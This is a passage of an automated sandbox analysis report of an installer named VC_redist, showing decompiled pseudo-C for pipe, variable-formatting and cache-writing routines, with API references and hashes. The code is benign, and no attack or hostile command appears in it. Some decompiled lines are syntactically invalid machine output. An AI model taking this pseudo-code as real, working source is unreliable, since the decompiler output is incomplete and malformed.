                                                                          • WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,000B442A,?,000FB4F0), ref: 000C540A
                                                                          • ReadFile.KERNELBASE(?,00000000,00000004,00000000,00000000,?,000B442A,?,000FB4F0), ref: 000C5425
                                                                          • GetLastError.KERNEL32(?,000B442A,?,000FB4F0), ref: 000C547D
                                                                          • GetLastError.KERNEL32(?,000B442A,?,000FB4F0), ref: 000C54B1
                                                                          • GetLastError.KERNEL32(?,000B442A,?,000FB4F0), ref: 000C54E5
                                                                          • GetLastError.KERNEL32(?,000B442A,?,000FB4F0), ref: 000C557B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
                                                                          • String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$crypt32.dll$pipe.cpp
                                                                          • API String ID: 2944378912-2047837012
                                                                          • Opcode ID: c907c3aeb6e49e5a3b019532e5823b0a1267679e78c0d468cf3b5db45cfb738c
                                                                          • Instruction ID: 6ce237126ed5418f4e2770093bf3790831a6f57444c12b7adf6a39969bff482c
                                                                          • Opcode Fuzzy Hash: c907c3aeb6e49e5a3b019532e5823b0a1267679e78c0d468cf3b5db45cfb738c
                                                                          • Instruction Fuzzy Hash: EE61C7B6E40725ABF7209BA9CC45FFFB6E8EF04741F114125BD01E7180D7A49E409AE1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000B567D Relevance: 42.5, APIs: 5, Strings: 19, Instructions: 476stringCOMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 772 b567d-b56c4 EnterCriticalSection lstrlenW call b1ede 775 b56ca-b56d7 call f012f 772->775 776 b58b1-b58bf call df7ca 772->776 783 b5b53-b5b61 LeaveCriticalSection 775->783 781 b56dc-b56ee call df7ca 776->781 782 b58c5-b58e2 call b823e 776->782 781->782 794 b56f4-b5700 781->794 797 b5728 782->797 798 b58e8-b58eb call ef3d0 782->798 786 b5b9c-b5ba1 783->786 787 b5b63-b5b69 783->787 789 b5ba9-b5bad 786->789 790 b5ba3-b5ba4 call ef3c0 786->790 792 b5b6b 787->792 793 b5b96-b5b97 call b3999 787->793 800 b5baf-b5bb3 789->800 801 b5bcd-b5be0 call b2793 * 3 789->801 790->789 795 b5b6d-b5b71 792->795 793->786 804 b573a-b573c 794->804 805 b5702-b5722 call b823e 794->805 806 b5b83-b5b86 call b2793 795->806 807 b5b73-b5b77 795->807 808 b572d 797->808 822 b58f0-b58f7 798->822 802 b5bbd-b5bc1 800->802 803 b5bb5-b5bb8 call f54ef 800->803 816 b5be5-b5bed 801->816 815 b5bc3-b5bcb call f54ef 802->815 802->816 803->802 820 b573e-b575f call b823e 804->820 821 b5764-b5785 call b8281 804->821 805->797 835 b58ab-b58ae 805->835 813 b5b8b-b5b8e 806->813 807->813 814 b5b79-b5b81 call f54ef 807->814 818 b572e-b5735 call f012f 808->818 813->795 827 b5b90-b5b93 813->827 814->813 815->816 846 b5b50 818->846 820->797 848 b5761 820->848 843 b578b-b579d 821->843 844 b5998-b599d 821->844 830 b58fd-b591c call b37d3 822->830 831 b59a2-b59b0 call ef3e0 822->831 827->793 849 b593d-b593e 830->849 852 b59b2-b59e2 call b37d3 831->852 853 b59e7-b59ee 831->853 835->776 850 b579f-b57a7 call b3a72 843->850 851 b57b4-b57c0 call b38d4 843->851 844->808 846->783 848->821 849->818 865 b591e-b5938 call b37d3 850->865 866 b57ad-b57b2 850->866 867 b5977-b5996 call b37d3 851->867 868 b57c6-b57ca 851->868 852->808 857 b5a21-b5a3c call ef3f0 853->857 858 b59f0-b59f3 853->858 873 b5a3e-b5a40 857->873 874 b5aac-b5ab0 857->874 863 b59f6-b5a01 858->863 869 b5a1a-b5a1d 863->869 870 b5a03-b5a12 call ef3e0 863->870 865->849 866->868 867->849 875 b57cc-b57d3 868->875 876 b57f2-b57f6 868->876 869->863 871 b5a1f 869->871 895 b5a77-b5aa7 call b37d3 870->895 896 b5a14-b5a17 870->896 871->857 873->874 881 b5a42-b5a72 call b37d3 873->881 883 b5ab6-b5acf call b821f 874->883 884 b5b44-b5b49 874->884 875->876 882 b57d5-b57f0 call b8281 875->882 886 b57f8-b580e call b7e13 876->886 887 b5814-b581b 876->887 881->808 908 b5862-b5864 882->908 909 b5adb-b5aed call ef3f0 883->909 910 b5ad1-b5ad6 883->910 884->846 892 b5b4b-b5b4e 884->892 886->887 904 b5943-b5954 call f012f 886->904 889 b581d-b582e call b21a5 887->889 890 b5830-b583a call b7203 887->890 913 b585a-b585c 889->913 906 b583f-b584a 890->906 892->846 895->808 896->869 904->846 914 b585f 906->914 915 b584c-b5855 call b22f9 906->915 916 b586a-b5888 call b8260 908->916 917 b596d 908->917 923 b5aef-b5b1f call b37d3 909->923 924 b5b24-b5b38 call b8281 909->924 910->808 913->914 914->908 915->913 925 b588e-b58a5 call b823e 916->925 926 b5963 916->926 917->867 923->808 924->884 933 b5b3a-b5b3f 924->933 925->835 934 b5959 925->934 926->917 933->808 934->926
                                                                          C-Code - Quality: 63%
                                                                          			E000B567D(struct _CRITICAL_SECTION* _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _t138;
				WCHAR* _t141;
				intOrPtr _t143;
				WCHAR* _t144;
				signed short _t156;
				signed short _t162;
				intOrPtr _t168;
				signed short _t169;
				WCHAR* _t182;
				WCHAR* _t190;
				intOrPtr _t199;
				signed int _t215;
				void* _t216;
				char _t219;
				void* _t221;
				char _t227;
				intOrPtr* _t228;
				signed int _t229;
				intOrPtr* _t237;
				WCHAR* _t238;
				signed int _t239;
				WCHAR* _t240;
				signed int _t241;
				signed int _t242;
				WCHAR* _t243;
				intOrPtr _t244;
				WCHAR* _t248;
				WCHAR* _t249;
				intOrPtr _t250;
				void* _t265;

				_t215 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_v8 = 0;
				_v20 = 0;
				_v36 = 0;
				_v32 = 0;
				EnterCriticalSection(_a4);
				_t238 = _a8;
				_t248 = E000B1EDE( &_v16, lstrlenW(_t238) + 1);
				_a8 = _t248;
				if(_t248 >= 0) {
					while(1) {
						_push(0x5b);
						_t216 = E000DF7CA(_t219);
						_t221 = _t238;
						if(_t216 == 0) {
							break;
						}
						_t12 = _t216 + 2; // 0x2
						_push(0x5d);
						_t138 = E000DF7CA(_t221);
						_v40 = _t138;
						if(_t138 == 0) {
							break;
						}
						_t219 = (_t138 - _t216 >> 1) - 1;
						_v20 = _t219;
						if(_t219 != 0) {
							if(_t216 <= _t238) {
								L12:
								_t26 = _t216 + 2; // 0x2
								_v28 = 0 | _a20 == 0x00000000;
								_t249 = E000B8281(_a20 == 0,  &_v12, _t26, _t219);
								_a8 = _t249;
								if(_t249 < 0) {
									_push("Failed to get variable name.");
									L7:
									_push(_t249);
									L8:
									E000F012F();
									L66:
									_t215 = _v8;
									goto L67;
								}
								_t219 = _v24;
								_push(1);
								_push(4 + _v8 * 4);
								if(_t219 == 0) {
									_t244 = E000B38D4();
									_v24 = _t244;
									if(_t244 == 0) {
										_t243 = 0x8007000e;
										_t249 = 0x8007000e;
										_a8 = 0x8007000e;
										E000B37D3(_t180, "variable.cpp", 0x4b6, 0x8007000e);
										_push("Failed to allocate variable array.");
										L37:
										_push(_t243);
										goto L8;
									}
									L17:
									if(_v20 < 2) {
										L20:
										if(_a20 == 0) {
											L22:
											_t215 = _v8;
											if(_v36 == 0) {
												_t245 = _t244 + _t215 * 4;
												_t182 = E000B7203(_t219, _a4, _v12, _t244 + _t215 * 4); // executed
												_t249 = _t182;
												_a8 = _t249;
												if(_t249 != 0x80070490) {
													L27:
													_t246 = _v28;
													L28:
													if(_t249 < 0) {
														_push("Failed to set variable value.");
														goto L2;
													}
													_t215 = _t215 + 1;
													_v8 = _t215;
													_t249 = E000B8260(_t246,  &_v12, L"[%d]", _t215);
													_t265 = _t265 + 0x10;
													_a8 = _t249;
													if(_t249 < 0) {
														_push("Failed to format placeholder string.");
														goto L2;
													}
													_t249 = E000B823E(_t246,  &_v16, _v12, 0);
													_a8 = _t249;
													if(_t249 < 0) {
														_push("Failed to append placeholder.");
														goto L2;
													}
													L31:
													_t238 = _v40 + 2;
													continue;
												}
												_t190 = E000B22F9(_t245, 0xfb524, 0);
												L26:
												_t249 = _t190;
												_a8 = _t249;
												goto L27;
											}
											_t190 = E000B21A5(_t244 + _t215 * 4, L"*****", 0);
											goto L26;
										}
										_t249 = E000B7E13(_t219, _a4, _v12,  &_v36);
										_a8 = _t249;
										if(_t249 < 0) {
											E000F012F(_t249, "Failed to determine variable visibility: \'%ls\'.", _v12);
											goto L66;
										}
										goto L22;
									}
									_t219 = 0x5c;
									if(_t219 !=  *((intOrPtr*)(_t216 + 2))) {
										goto L20;
									}
									_t41 = _t216 + 4; // 0x4
									_t215 = _v8;
									_t246 = _v28;
									_t249 = E000B8281(_v28, _t244 + _t215 * 4, _t41, 1);
									_a8 = _t249;
									goto L28;
								}
								_push(_t219);
								_t199 = E000B3A72();
								if(_t199 == 0) {
									_t243 = 0x8007000e;
									_t249 = 0x8007000e;
									_a8 = 0x8007000e;
									E000B37D3(_t199, "variable.cpp", 0x4b0, 0x8007000e);
									_push("Failed to reallocate variable array.");
									goto L37;
								}
								_t244 = _t199;
								_v24 = _t244;
								goto L17;
							}
							_t249 = E000B823E(0 | _a20 == 0x00000000,  &_v16, _t238, _t216 - _t238 >> 1);
							_a8 = _t249;
							if(_t249 < 0) {
								L6:
								_push("Failed to append string.");
								goto L7;
							} else {
								_t219 = _v20;
								goto L12;
							}
						}
						_t249 = E000B823E(0 | _a20 == 0x00000000,  &_v16, _t238, (_t138 - _t238 >> 1) + 1);
						_a8 = _t249;
						if(_t249 >= 0) {
							goto L31;
						}
						goto L6;
					}
					_t218 = 0 | _a20 == 0x00000000;
					_t141 = E000B823E(_a20 == 0,  &_v16, _t238, 0);
					_t249 = _t141;
					_a8 = _t249;
					if(_t249 < 0) {
						goto L6;
					}
					_push(_v8);
					L000EF3D0(); // executed
					_t240 = _t141;
					_v32 = _t240;
					if(_t240 != 0) {
						_push(_v16);
						_push(0);
						_push(_t240);
						L000EF3E0();
						if(0 == 0) {
							_t227 = 0;
							_t241 = 0;
							if(_v8 <= 0) {
								L53:
								_t242 = _v32;
								_t156 =  &_v20;
								_push(_t156);
								_push(0xfb524);
								_push(_t242);
								_push(_t227);
								_v20 = _t227;
								L000EF3F0();
								if(_t156 == 0xea || _t156 == 0) {
									if(_a12 == 0) {
										L64:
										_t228 = _a16;
										if(_t228 != 0) {
											 *_t228 = _v20;
										}
										goto L66;
									}
									_v20 = _v20 + 1;
									_t249 = E000B821F(_t218,  &_v12, _v20 + 1);
									_a8 = _t249;
									if(_t249 >= 0) {
										_t162 =  &_v20;
										_push(_t162);
										_push(_v12);
										_push(_t242);
										_push(0);
										L000EF3F0();
										if(_t162 == 0) {
											_t249 = E000B8281(_t218, _a12, _v12, 0);
											_a8 = _t249;
											if(_t249 >= 0) {
												goto L64;
											}
											_push("Failed to copy string.");
											goto L7;
										}
										_t254 =  <=  ? _t162 : _t162 & 0x0000ffff | 0x80070000;
										_t249 =  >=  ? 0x80004005 :  <=  ? _t162 : _t162 & 0x0000ffff | 0x80070000;
										_a8 = _t249;
										E000B37D3(0x80004005, "variable.cpp", 0x508, _t249);
										_push("Failed to format record.");
										goto L7;
									}
									_push("Failed to allocate string.");
								} else {
									_t257 =  <=  ? _t156 : _t156 & 0x0000ffff | 0x80070000;
									_t249 =  >=  ? 0x80004005 :  <=  ? _t156 : _t156 & 0x0000ffff | 0x80070000;
									_a8 = _t249;
									E000B37D3(0x80004005, "variable.cpp", 0x4fe, _t249);
									_push("Failed to get formatted length.");
								}
								goto L7;
							}
							_t168 = _v24;
							_t229 = _v8;
							do {
								_t237 =  *((intOrPtr*)(_t168 + _t241 * 4));
								_t249 = _a8;
								if( *_t237 == 0) {
									goto L51;
								}
								_push(_t237);
								_t89 = _t241 + 1; // 0x1
								_t169 = _t89;
								_push(_t169);
								_push(_v32);
								L000EF3E0();
								if(_t169 != 0) {
									_t261 =  <=  ? _t169 : _t169 & 0x0000ffff | 0x80070000;
									_t249 =  >=  ? 0x80004005 :  <=  ? _t169 : _t169 & 0x0000ffff | 0x80070000;
									_a8 = _t249;
									E000B37D3(0x80004005, "variable.cpp", 0x4f2, _t249);
									_push("Failed to set record string.");
									goto L7;
								}
								_t168 = _v24;
								_t229 = _v8;
								L51:
								_t241 = _t241 + 1;
							} while (_t241 < _t229);
							_t227 = 0;
							goto L53;
						}
						_t264 =  <=  ? 0 : 0xffffffff80070000;
						_t249 =  >=  ? 0x80004005 :  <=  ? 0 : 0xffffffff80070000;
						_a8 = _t249;
						E000B37D3(0x80004005, "variable.cpp", 0x4ea, _t249);
						_push("Failed to set record format string.");
						goto L7;
					}
					_t243 = 0x8007000e;
					_t249 = 0x8007000e;
					_a8 = 0x8007000e;
					E000B37D3(_t141, "variable.cpp", 0x4e6, 0x8007000e);
					_push("Failed to allocate record.");
					goto L37;
				} else {
					_push("Failed to allocate buffer for format string.");
					L2:
					_push(_t249);
					E000F012F();
					L67:
					LeaveCriticalSection(_a4);
					_t143 = _v24;
					if(_t143 == 0) {
						L77:
						_t144 = _v32;
						if(_t144 != 0) {
							_push(_t144); // executed
							L000EF3C0(); // executed
						}
						if(_a20 == 0) {
							E000B2793(0);
							E000B2793(_v16);
							E000B2793(_v12);
						} else {
							if(_v16 != 0) {
								E000F54EF(_v16);
							}
							if(_v12 != 0) {
								E000F54EF(_v12);
							}
						}
						return _t249;
					}
					_t239 = 0;
					if(_t215 == 0) {
						L76:
						E000B3999(_t143);
						goto L77;
					}
					_t250 = _t143;
					do {
						if(_a20 == 0) {
							E000B2793( *((intOrPtr*)(_t250 + _t239 * 4)));
						} else {
							if( *((intOrPtr*)(_t250 + _t239 * 4)) != 0) {
								E000F54EF( *((intOrPtr*)(_t250 + _t239 * 4)));
							}
						}
						_t239 = _t239 + 1;
					} while (_t239 < _t215);
					_t249 = _a8;
					_t143 = _v24;
					goto L76;
				}
			}










































                                                                          0x000b568b
                                                                          0x000b568d
                                                                          0x000b5690
                                                                          0x000b5693
                                                                          0x000b5696
                                                                          0x000b5699
                                                                          0x000b569c
                                                                          0x000b569f
                                                                          0x000b56a2
                                                                          0x000b56a8
                                                                          0x000b56bd
                                                                          0x000b56bf
                                                                          0x000b56c4
                                                                          0x000b58b1
                                                                          0x000b58b1
                                                                          0x000b58b9
                                                                          0x000b58bc
                                                                          0x000b58bf
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b56dc
                                                                          0x000b56df
                                                                          0x000b56e2
                                                                          0x000b56e7
                                                                          0x000b56ee
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b56fa
                                                                          0x000b56fd
                                                                          0x000b5700
                                                                          0x000b573c
                                                                          0x000b5764
                                                                          0x000b5767
                                                                          0x000b5776
                                                                          0x000b577e
                                                                          0x000b5780
                                                                          0x000b5785
                                                                          0x000b5998
                                                                          0x000b572d
                                                                          0x000b572d
                                                                          0x000b572e
                                                                          0x000b572e
                                                                          0x000b5b50
                                                                          0x000b5b50
                                                                          0x00000000
                                                                          0x000b5b50
                                                                          0x000b578e
                                                                          0x000b5791
                                                                          0x000b579a
                                                                          0x000b579d
                                                                          0x000b57b9
                                                                          0x000b57bb
                                                                          0x000b57c0
                                                                          0x000b5977
                                                                          0x000b5982
                                                                          0x000b5989
                                                                          0x000b598c
                                                                          0x000b5991
                                                                          0x000b593d
                                                                          0x000b593d
                                                                          0x00000000
                                                                          0x000b593d
                                                                          0x000b57c6
                                                                          0x000b57ca
                                                                          0x000b57f2
                                                                          0x000b57f6
                                                                          0x000b5814
                                                                          0x000b5818
                                                                          0x000b581b
                                                                          0x000b5830
                                                                          0x000b583a
                                                                          0x000b583f
                                                                          0x000b5841
                                                                          0x000b584a
                                                                          0x000b585f
                                                                          0x000b585f
                                                                          0x000b5862
                                                                          0x000b5864
                                                                          0x000b596d
                                                                          0x00000000
                                                                          0x000b596d
                                                                          0x000b586a
                                                                          0x000b5876
                                                                          0x000b587e
                                                                          0x000b5880
                                                                          0x000b5883
                                                                          0x000b5888
                                                                          0x000b5963
                                                                          0x00000000
                                                                          0x000b5963
                                                                          0x000b589e
                                                                          0x000b58a0
                                                                          0x000b58a5
                                                                          0x000b5959
                                                                          0x00000000
                                                                          0x000b5959
                                                                          0x000b58ab
                                                                          0x000b58ae
                                                                          0x00000000
                                                                          0x000b58ae
                                                                          0x000b5855
                                                                          0x000b585a
                                                                          0x000b585a
                                                                          0x000b585c
                                                                          0x00000000
                                                                          0x000b585c
                                                                          0x000b5829
                                                                          0x00000000
                                                                          0x000b5829
                                                                          0x000b5807
                                                                          0x000b5809
                                                                          0x000b580e
                                                                          0x000b594c
                                                                          0x00000000
                                                                          0x000b5951
                                                                          0x00000000
                                                                          0x000b580e
                                                                          0x000b57ce
                                                                          0x000b57d3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b57d5
                                                                          0x000b57d8
                                                                          0x000b57e1
                                                                          0x000b57eb
                                                                          0x000b57ed
                                                                          0x00000000
                                                                          0x000b57ed
                                                                          0x000b579f
                                                                          0x000b57a0
                                                                          0x000b57a7
                                                                          0x000b591e
                                                                          0x000b5929
                                                                          0x000b5930
                                                                          0x000b5933
                                                                          0x000b5938
                                                                          0x00000000
                                                                          0x000b5938
                                                                          0x000b57ad
                                                                          0x000b57af
                                                                          0x00000000
                                                                          0x000b57af
                                                                          0x000b5758
                                                                          0x000b575a
                                                                          0x000b575f
                                                                          0x000b5728
                                                                          0x000b5728
                                                                          0x00000000
                                                                          0x000b5761
                                                                          0x000b5761
                                                                          0x00000000
                                                                          0x000b5761
                                                                          0x000b575f
                                                                          0x000b571b
                                                                          0x000b571d
                                                                          0x000b5722
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b5722
                                                                          0x000b58ca
                                                                          0x000b58d6
                                                                          0x000b58db
                                                                          0x000b58dd
                                                                          0x000b58e2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b58e8
                                                                          0x000b58eb
                                                                          0x000b58f0
                                                                          0x000b58f2
                                                                          0x000b58f7
                                                                          0x000b59a2
                                                                          0x000b59a7
                                                                          0x000b59a8
                                                                          0x000b59a9
                                                                          0x000b59b0
                                                                          0x000b59e7
                                                                          0x000b59e9
                                                                          0x000b59ee
                                                                          0x000b5a21
                                                                          0x000b5a21
                                                                          0x000b5a24
                                                                          0x000b5a27
                                                                          0x000b5a28
                                                                          0x000b5a2d
                                                                          0x000b5a2e
                                                                          0x000b5a2f
                                                                          0x000b5a32
                                                                          0x000b5a3c
                                                                          0x000b5ab0
                                                                          0x000b5b44
                                                                          0x000b5b44
                                                                          0x000b5b49
                                                                          0x000b5b4e
                                                                          0x000b5b4e
                                                                          0x00000000
                                                                          0x000b5b49
                                                                          0x000b5abb
                                                                          0x000b5ac8
                                                                          0x000b5aca
                                                                          0x000b5acf
                                                                          0x000b5adb
                                                                          0x000b5ae0
                                                                          0x000b5ae1
                                                                          0x000b5ae4
                                                                          0x000b5ae5
                                                                          0x000b5ae6
                                                                          0x000b5aed
                                                                          0x000b5b31
                                                                          0x000b5b33
                                                                          0x000b5b38
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b5b3a
                                                                          0x00000000
                                                                          0x000b5b3a
                                                                          0x000b5afa
                                                                          0x000b5b04
                                                                          0x000b5b12
                                                                          0x000b5b15
                                                                          0x000b5b1a
                                                                          0x00000000
                                                                          0x000b5b1a
                                                                          0x000b5ad1
                                                                          0x000b5a42
                                                                          0x000b5a4d
                                                                          0x000b5a57
                                                                          0x000b5a65
                                                                          0x000b5a68
                                                                          0x000b5a6d
                                                                          0x000b5a6d
                                                                          0x00000000
                                                                          0x000b5a3c
                                                                          0x000b59f0
                                                                          0x000b59f3
                                                                          0x000b59f6
                                                                          0x000b59f6
                                                                          0x000b59fe
                                                                          0x000b5a01
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b5a03
                                                                          0x000b5a04
                                                                          0x000b5a04
                                                                          0x000b5a07
                                                                          0x000b5a08
                                                                          0x000b5a0b
                                                                          0x000b5a12
                                                                          0x000b5a82
                                                                          0x000b5a8c
                                                                          0x000b5a9a
                                                                          0x000b5a9d
                                                                          0x000b5aa2
                                                                          0x00000000
                                                                          0x000b5aa2
                                                                          0x000b5a14
                                                                          0x000b5a17
                                                                          0x000b5a1a
                                                                          0x000b5a1a
                                                                          0x000b5a1b
                                                                          0x000b5a1f
                                                                          0x00000000
                                                                          0x000b5a1f
                                                                          0x000b59bd
                                                                          0x000b59c7
                                                                          0x000b59d5
                                                                          0x000b59d8
                                                                          0x000b59dd
                                                                          0x00000000
                                                                          0x000b59dd
                                                                          0x000b58fd
                                                                          0x000b5908
                                                                          0x000b590f
                                                                          0x000b5912
                                                                          0x000b5917
                                                                          0x00000000
                                                                          0x000b56ca
                                                                          0x000b56ca
                                                                          0x000b56cf
                                                                          0x000b56cf
                                                                          0x000b56d0
                                                                          0x000b5b53
                                                                          0x000b5b56
                                                                          0x000b5b5c
                                                                          0x000b5b61
                                                                          0x000b5b9c
                                                                          0x000b5b9c
                                                                          0x000b5ba1
                                                                          0x000b5ba3
                                                                          0x000b5ba4
                                                                          0x000b5ba4
                                                                          0x000b5bad
                                                                          0x000b5bd0
                                                                          0x000b5bd8
                                                                          0x000b5be0
                                                                          0x000b5baf
                                                                          0x000b5bb3
                                                                          0x000b5bb8
                                                                          0x000b5bb8
                                                                          0x000b5bc1
                                                                          0x000b5bc6
                                                                          0x000b5bc6
                                                                          0x000b5bc1
                                                                          0x000b5bed
                                                                          0x000b5bed
                                                                          0x000b5b65
                                                                          0x000b5b69
                                                                          0x000b5b96
                                                                          0x000b5b97
                                                                          0x00000000
                                                                          0x000b5b97
                                                                          0x000b5b6b
                                                                          0x000b5b6d
                                                                          0x000b5b71
                                                                          0x000b5b86
                                                                          0x000b5b73
                                                                          0x000b5b77
                                                                          0x000b5b7c
                                                                          0x000b5b7c
                                                                          0x000b5b77
                                                                          0x000b5b8b
                                                                          0x000b5b8c
                                                                          0x000b5b90
                                                                          0x000b5b93
                                                                          0x00000000
                                                                          0x000b5b93

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(000002C0,00000100,00000100,00000000,00000000,?,000B99BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 000B56A2
                                                                          • lstrlenW.KERNEL32(00000000,?,000B99BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 000B56AC
                                                                          • _wcschr.LIBVCRUNTIME ref: 000B58B4
                                                                          • LeaveCriticalSection.KERNEL32(000002C0,00000000,00000000,00000000,00000000,00000000,00000001,?,000B99BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0), ref: 000B5B56
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave_wcschrlstrlen
                                                                          • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
                                                                          • API String ID: 1026845265-2050445661
                                                                          • Opcode ID: 6554ec4d894fe2a1a7ad45fb9961a37a42d0dd4c9e768494d04cc096c2e4c0de
                                                                          • Instruction ID: 3c65b982ea1f733e275f2d8777fa1260d63bd2d720d8dc9b499e0275568d9994
                                                                          • Opcode Fuzzy Hash: 6554ec4d894fe2a1a7ad45fb9961a37a42d0dd4c9e768494d04cc096c2e4c0de
                                                                          • Instruction Fuzzy Hash: 0FF1B072E00619ABDB219FA48C41FFF7BA9EF44751F10416ABE05BB241DB349E01DBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000C84C4 Relevance: 37.0, APIs: 9, Strings: 12, Instructions: 205fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 935 c84c4-c8512 CreateFileW 936 c8558-c8568 call f47d3 935->936 937 c8514-c8553 call b37d3 call f012f 935->937 942 c856a-c857b call f012f 936->942 943 c8580-c858b call f3db5 936->943 956 c86fc-c870e call dde36 937->956 950 c86f5-c86f6 FindCloseChangeNotification 942->950 948 c8590-c8594 943->948 951 c85af-c85b4 948->951 952 c8596-c85aa call f012f 948->952 950->956 951->950 955 c85ba-c85c9 SetFilePointerEx 951->955 952->950 958 c85cb-c85fe call b37d3 955->958 959 c8603-c8613 call f4cee 955->959 968 c86ed-c86f4 call f012f 958->968 965 c861f-c8630 SetFilePointerEx 959->965 966 c8615-c861a 959->966 969 c866a-c867a call f4cee 965->969 970 c8632-c8665 call b37d3 965->970 966->968 968->950 969->966 978 c867c-c868c call f4cee 969->978 970->968 978->966 982 c868e-c869f SetFilePointerEx 978->982 983 c86d6-c86e6 call f4cee 982->983 984 c86a1-c86d4 call b37d3 982->984 983->950 989 c86e8 983->989 984->968 989->968
                                                                          C-Code - Quality: 71%
                                                                          			E000C84C4(void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t25;
				void* _t29;
				void* _t31;
				void* _t33;
				signed short _t51;
				signed short _t54;
				signed short _t57;
				signed short _t62;
				intOrPtr _t66;
				WCHAR* _t67;
				void* _t73;
				void* _t75;
				signed int _t91;

				_t73 = __edx;
				_t25 =  *0x11a008; // 0xf77c1860
				_v8 = _t25 ^ _t91;
				_t67 = _a12;
				_t66 = _a16;
				_t76 = _a4;
				_v28 = _a8;
				_v32 = _a4;
				asm("stosd");
				asm("stosd");
				_v24 = _t67;
				asm("stosd"); // executed
				_t29 = CreateFileW(_t67, 0x40000000, 5, 0, 2, 0x8000080, 0); // executed
				_t75 = _t29;
				if(_t75 != 0xffffffff) {
					_t31 = E000F47D3(_t67, _t76, 0, 0, 0, 0); // executed
					_t77 = _t31;
					if(_t31 >= 0) {
						_t33 = E000F3DB5(_t73, _v32, _t75,  *((intOrPtr*)(_t66 + 0xc)), 0, 0); // executed
						_t77 = _t33;
						if(_t77 >= 0) {
							if( *((intOrPtr*)(_t66 + 0x28)) != 0) {
								_push(0);
								if(SetFilePointerEx(_t75,  *(_t66 + 0x18), 0, 0) != 0) {
									if(E000F4CEE(0, _t75, _t66 + 0x24, 4) >= 0) {
										_push(0);
										if(SetFilePointerEx(_t75,  *(_t66 + 0x1c), 0, 0) != 0) {
											_t77 = E000F4CEE(0, _t75, _t66 + 0x28, 4);
											if(_t77 < 0) {
												goto L10;
											} else {
												_t77 = E000F4CEE(0, _t75, _t66 + 0x2c, 4);
												if(_t77 < 0) {
													goto L10;
												} else {
													_push(0);
													if(SetFilePointerEx(_t75,  *(_t66 + 0x20), 0, 0) != 0) {
														_t77 = E000F4CEE(0, _t75,  &_v20, 0xc);
														if(_t77 < 0) {
															_push("Failed to zero out original data offset.");
															goto L19;
														}
													} else {
														_t51 = GetLastError();
														_t81 =  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
														_t77 =  >=  ? 0x80004005 :  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
														E000B37D3(0x80004005, "cache.cpp", 0x6d6, _t77);
														_push("Failed to seek to original data in exe burn section header.");
														goto L19;
													}
												}
											}
										} else {
											_t54 = GetLastError();
											_t84 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
